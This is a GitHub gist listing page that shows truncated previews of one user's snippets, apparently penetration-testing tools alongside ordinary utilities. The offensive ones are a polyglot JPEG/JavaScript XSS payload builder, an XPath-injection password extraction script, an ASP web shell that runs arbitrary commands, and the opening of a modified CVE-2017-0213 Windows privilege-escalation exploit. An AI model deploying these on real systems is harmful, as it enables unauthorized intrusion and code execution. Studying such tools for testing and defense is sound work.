wxrdnx

  • University of Wisconsin
  • Madison, Wisconsin
@wxrdnx
wxrdnx / polygot_jpeg_js.py
Created February 21, 2025 23:28
Polyglot JPEG JS
img = b''
xss_payload = b'*/=1;' # ÿØÿà=1
xss_payload += b'alert(1)' # The actual XSS payload
xss_payload += b'/*' # Comment out the rest of the image
malicious_file = b'exploit.jpg'
assert len(xss_payload) + 2 < 0x10000, "The length of your XSS Payload should be less than 0x10000"
img += b'\xff\xd8' # SOI
@wxrdnx
wxrdnx / aiohttp_parallel_scan.py
Last active February 6, 2025 21:42
aiohttp parallel scan
import aiohttp
import asyncio
async def fetch(session, url):
    async with session.get(url) as response:
        result = await response.text()
        if not (len(result) in [139, 142, 145]):
            print(url, result, len(result))
async def main():
@wxrdnx
wxrdnx / build_web_socket_frame.py
Last active February 6, 2025 21:47
Build Web Socket Frame
import os
def build_websocket_frame(data):
    frame = b'\x81'
    if len(data) <= 125:
        frame += bytes([0x80 | len(data)])
    elif len(data) <= 65535:
        frame += bytes([0x80 | 126])
        frame += len(data).to_bytes(2, 'big')
else:
@wxrdnx
wxrdnx / xpath_boolean.py
Created November 18, 2024 23:33
XPath Injection Boolean
import requests
import string
url = ...
username = ...
MAX_PW_LEN = 64
def success(html):
    return username in html
@wxrdnx
wxrdnx / GNUPG Cheatsheet.md
Created May 2, 2024 03:11 — forked from turingbirds/GNUPG Cheatsheet.md
GPG (GNUPG) Cheatsheet

GNUPG CHEATSHEET

Setting up: key generation

This generates a public/private keypair.

$ gpg --gen-key

$ gpg --list-secret-keys

@wxrdnx
wxrdnx / pure_hex_dump.sh
Created April 19, 2024 22:22
Pure Hex Dump for Linux
od -t x1 -An file.txt | sed 's/ //g' | tr -d '\n'
@wxrdnx
wxrdnx / web_shell.asp
Created April 3, 2024 22:56
ASP Web Shell That Actually Works
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
Dim objShell, objCmdExec
Set objShell = CreateObject("WScript.Shell")
Set objCmdExec = objshell.exec(thecommand)
getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
@wxrdnx
wxrdnx / CVE-2017-0213_modified.cpp
Created March 9, 2024 20:45
CVE-2017-0213 Modified
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1107
Windows: COM Aggregate Marshaler/IRemUnknown2 Type Confusion EoP
Platform: Windows 10 10586/14393 not tested 8.1 Update 2
Class: Elevation of Privilege
Summary:
When accessing an OOP COM object using IRemUnknown2 the local unmarshaled proxy can be for a different interface to that requested by QueryInterface resulting in a type confusion which can result in EoP.
@wxrdnx
wxrdnx / fatal_function.c
Created February 28, 2024 19:13
The fatal function in C
void noreturn fatal(const char *fmt, ...) {
    va_list args;
    va_start(args, fmt);
    vfprintf(stderr, fmt, args);
    va_end(args);
    exit(EXIT_FAILURE);
}
@wxrdnx
wxrdnx / fatal_macro.c
Created February 28, 2024 19:12
The fatal function in C using macro
#define die(fmt, ...) do { \
    fprintf(stderr, fmt, ##__VA_ARGS__); \
    exit(EXIT_FAILURE); \
} while (0)